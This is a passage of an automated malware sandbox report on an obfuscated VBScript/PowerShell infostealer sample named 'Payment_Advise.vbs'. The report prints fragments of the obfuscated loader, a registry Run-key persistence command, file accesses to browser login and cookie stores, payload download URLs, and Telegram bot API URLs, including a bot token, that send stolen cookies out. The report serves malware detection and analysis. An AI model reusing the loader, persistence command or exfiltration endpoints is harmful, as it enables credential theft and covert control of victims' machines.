gi-trysaprolgsed,erundnmisst';$imperativ=pachyhematous214 'flugh hv tc ret dehprejfsblyh:bryd/semi/vegeh oriopr,vmd scaindiy setelunk-sco sleiba,aemlmlleapagem.ogfaflogtsand.ce tcugeno u,dmk gl/ nprtsparosystpperq/,onic su.o esklp,ptl ubeeoutbgsaalilullabespnn.utt rr,.borepta efamalb';$afkalkningsanlgget=pachyhematous214 'sche>';$chiropractic=pachyhematous214 'distigorbeaurex';$neuronic='afrydningen';$afgrdevalg219='\toldeftersyn.man';verdensbermthedernes242 (pachyhematous214 ' exo$ kaigsydsl ageob rdbavalademolbala:.yaegfac lnobey idfnagly= .ar$hydre seinf,agv fo :coawa e tpaeonp lundudstamanvts,lua lis+indi$chefa,equfpaamg crer .dmdf ree ,ukvdolkasamflkumaghvid2n ni1hete9');verdensbermthedernes242 (pachyhematous214 'sed $d.pogs.dblmuddo u obdeliaskoslr.pi:hj,mt reholebef ne otingr repemono=unim$gameijingm r np lyselu,er lina o.at aceidyppv non.h,ves spophalclrilliexogtcalc( lgo$u unavrelf,reskgigmadundlhaemke penesquilydsn i sgsycosmetaanotenungdl rasgbatig isiepseuthepa)');verdensbermthedernes242 (pachyhematous214 $disvisor);$imperativ=$tofore[0];$optllingens=(pachyhematous214 'cann$ hanginfalfomeo ndbpatcat lslbo i:gelab,omiemonotjagta sublvareit.wingratgor assoffe st vstumntranebi e=galansocreuroswsjus-lslao s obantijphy ecroscafslt t i s ftssultygue.s thetsecrepennm op .ido.$civis,ormiovergvelsn pare');verdensbermthedernes242 ($optllingens);verdensbermthedernes242 (pachyhematous214 ' g n$replbper,e last o eagamel orsiomphn ,olgor lsvir eval v dvbnindsevejr.rankhr.tiev caa d,dd aaesubarhvorsblac[ b,s$macrtneurrsupeoprJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "faderskabernes" /t reg_expand_sz /d "%demiowl% -windowstyle 1 $piddlingly=(gi 'hkcu:\software\underforstaaende\').getvalue('udbetalingskortet');%demiowl% ($piddlingly)"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000011.00000002.2189282837.00000000258F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.2189282837.0000000025ADB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000011.00000002.2189282837.00000000258F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.2189282837.0000000025ADB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting
              Valid Accounts11
              Windows Management Instrumentation
              221
              Scripting
              1
              DLL Side-Loading
              3
              Obfuscated Files or Information
              1
              OS Credential Dumping
              1
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution
              1
              DLL Side-Loading
              311
              Process Injection
              1
              Software Packing
              LSASS Memory23
              System Information Discovery
              Remote Desktop Protocol1
              Data from Local System
              3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Command and Scripting Interpreter
              1
              Registry Run Keys / Startup Folder
              1
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              Security Account Manager121
              Security Software Discovery
              SMB/Windows Admin Shares1
              Email Collection
              21
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell
              Login HookLogin Hook11
              Masquerading
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture4
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Modify Registry
              LSA Secrets141
              Virtualization/Sandbox Evasion
              SSHKeylogging15
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
              Virtualization/Sandbox Evasion
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
              Process Injection
              DCSync1
              System Network Configuration Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1636428 Sample: Payment_Advise.vbs Startdate: 12/03/2025 Architecture: WINDOWS Score: 100 43 reallyfreegeoip.org 2->43 45 api.telegram.org 2->45 47 4 other IPs or domains 2->47 59 Suricata IDS alerts for network traffic 2->59 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 69 10 other signatures 2->69 9 powershell.exe 18 2->9         started        12 wscript.exe 1 2->12         started        14 svchost.exe 1 1 2->14         started        signatures3 65 Tries to detect the country of the analysis system (by using the IP) 43->65 67 Uses the Telegram API (likely for C&C communication) 45->67 process4 dnsIp5 71 Early bird code injection technique detected 9->71 73 Writes to foreign memory regions 9->73 75 Found suspicious powershell code related to unpacking or dynamic code loading 9->75 83 2 other signatures 9->83 17 msiexec.exe 17 9 9->17         started        21 conhost.exe 9->21         started        77 VBScript performs obfuscated calls to suspicious functions 12->77 79 Suspicious powershell command line found 12->79 81 Wscript starts Powershell (via cmd or directly) 12->81 85 2 other signatures 12->85 23 powershell.exe 14 18 12->23         started        25 WmiPrvSE.exe 12->25         started        49 127.0.0.1 unknown unknown 14->49 signatures6 process7 dnsIp8 35 api.telegram.org 149.154.167.220, 443, 51205, 51206 TELEGRAMRU United Kingdom 17->35 37 checkip.dyndns.com 193.122.130.0, 51188, 51191, 51193 ORACLE-BMC-31898US United States 17->37 39 reallyfreegeoip.org 104.21.112.1, 443, 51189, 51190 CLOUDFLARENETUS United States 17->39 51 Tries to steal Mail credentials (via file / registry access) 17->51 53 Tries to harvest and steal browser information (history, passwords, etc) 17->53 55 Hides threads from debuggers 17->55 27 cmd.exe 1 17->27         started        41 homaye-salamat.com 185.10.75.23, 443, 49685, 51187 IRANHOST-ASIR Iran (ISLAMIC Republic Of) 23->41 57 Found suspicious powershell code related to unpacking or dynamic code loading 23->57 29 conhost.exe 23->29         started        signatures9 process10 process11 31 conhost.exe 27->31         started        33 reg.exe 1 1 27->33         started       

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Payment_Advise.vbs27%VirustotalBrowse
              Payment_Advise.vbs18%ReversingLabsScript-WScript.Trojan.GuLoader
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://homaye-salamat.com/top/Collegiant.100%Avira URL Cloudmalware
              https://homaye-salamat.com100%Avira URL Cloudmalware
              https://homaye-salamat.com/top/Collegiant.pfb100%Avira URL Cloudmalware
              http://microsoft.co0%Avira URL Cloudsafe
              https://homaye-salamat.com/t100%Avira URL Cloudmalware
              https://homaye-salamat.com/top/C100%Avira URL Cloudmalware
              http://www.microsoft.cz:0%Avira URL Cloudsafe
              https://homaye-salamat.com/top/Colle100%Avira URL Cloudmalware
              https://homaye-salamat.c0%Avira URL Cloudsafe
              https://homaye-salamat.com/top/Collegi100%Avira URL Cloudmalware
              https://homaye-salamat.com/top/Coll100%Avira URL Cloudmalware
              https://homaye-salamat.com/top/Collegiant.pfbP100%Avira URL Cloudmalware
              https://homaye-salamat.com/finish/jQBlCBkXqDn162.bin100%Avira URL Cloudmalware
              https://homaye-salamat.com/top/Collegiant100%Avira URL Cloudmalware
              https://homaye-salamat.com/top/Collegiant.p100%Avira URL Cloudmalware
              https://homaye-salamat.com/top/Collegia100%Avira URL Cloudmalware
              https://homaye-salamat.com/to100%Avira URL Cloudmalware
              https://homaye-salamat.co0%Avira URL Cloudsafe
              https://homaye-salamat.com/100%Avira URL Cloudmalware
              https://homaye-salamat.com/top100%Avira URL Cloudmalware
              https://homaye-salamat.com/top/Collegiant.pf100%Avira URL Cloudmalware
              https://homaye-salamat.com/top/Co100%Avira URL Cloudmalware
              https://homaye-salamat.com/top/Col100%Avira URL Cloudmalware
              https://homaye-salamat.com/top/Collegian100%Avira URL Cloudmalware
              https://homaye-salamat.com/top/100%Avira URL Cloudmalware
              https://homaye-salamat.com/top/Colleg100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              199.232.210.172
              truefalse
                high
                reallyfreegeoip.org
                104.21.112.1
                truefalse
                  high
                  homaye-salamat.com
                  185.10.75.23
                  truefalse
                    unknown
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      checkip.dyndns.com
                      193.122.130.0
                      truefalse
                        high
                        checkip.dyndns.org
                        unknown
                        unknownfalse
                          high
                          206.23.85.13.in-addr.arpa
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://homaye-salamat.com/top/Collegiant.pfbtrue
                            • Avira URL Cloud: malware
                            unknown
                            https://reallyfreegeoip.org/xml/8.46.123.189false
                              high
                              https://homaye-salamat.com/finish/jQBlCBkXqDn162.bintrue
                              • Avira URL Cloud: malware
                              unknown
                              http://checkip.dyndns.org/false
                                high
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:651689%0D%0ADate%20and%20Time:%2013/03/2025%20/%2018:06:17%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20651689%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  high
                                  https://api.telegram.org/bot7328026738:AAH1IHU2hS9jcv-fByxTl7eMvqtctOYjBF8/sendDocument?chat_id=1503224244&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://homaye-salamat.com/top/Collegipowershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1181162714.000001597638D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://homaye-salamat.com/top/Collegiant.powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://homaye-salamat.cpowershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1156217112.0000015966547000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://homaye-salamat.compowershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1156217112.0000015966547000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://homaye-salamat.com/tpowershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1156217112.0000015966547000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://homaye-salamat.com/top/Collepowershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://microsoft.copowershell.exe, 00000002.00000002.1188426413.000001597E99C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://homaye-salamat.com/top/Cpowershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://www.microsoft.cz:powershell.exe, 00000002.00000002.1188426413.000001597E99C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://homaye-salamat.com/top/Collegiantpowershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://contoso.com/Licensepowershell.exe, 00000002.00000002.1181162714.000001597638D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://contoso.com/Iconpowershell.exe, 00000002.00000002.1181162714.000001597638D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://homaye-salamat.com/top/Collpowershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://homaye-salamat.com/top/Collegiant.pfbPpowershell.exe, 00000002.00000002.1156217112.0000015966547000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://homaye-salamat.copowershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1156217112.0000015966547000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://homaye-salamat.com/powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://homaye-salamat.com/top/Collegiapowershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://homaye-salamat.com/top/Collegiant.ppowershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://homaye-salamat.com/toppowershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://homaye-salamat.com/topowershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://homaye-salamat.com/top/Collegiant.pfpowershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://homaye-salamat.com/top/Copowershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://homaye-salamat.com/top/Collegianpowershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://homaye-salamat.com/top/Colpowershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://contoso.com/powershell.exe, 00000002.00000002.1181162714.000001597638D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1181162714.000001597638D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://homaye-salamat.com/top/powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.1156217112.0000015966321000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1156217112.0000015966321000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://homaye-salamat.com/top/Collegpowershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://crl.microspowershell.exe, 00000002.00000002.1188426413.000001597E99C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          149.154.167.220
                                                          api.telegram.orgUnited Kingdom
                                                          62041TELEGRAMRUfalse
                                                          104.21.112.1
                                                          reallyfreegeoip.orgUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          193.122.130.0
                                                          checkip.dyndns.comUnited States
                                                          31898ORACLE-BMC-31898USfalse
                                                          185.10.75.23
                                                          homaye-salamat.comIran (ISLAMIC Republic Of)
                                                          61055IRANHOST-ASIRfalse
                                                          IP
                                                          127.0.0.1
                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1636428
                                                          Start date and time:2025-03-12 19:14:22 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 7m 51s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:23
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
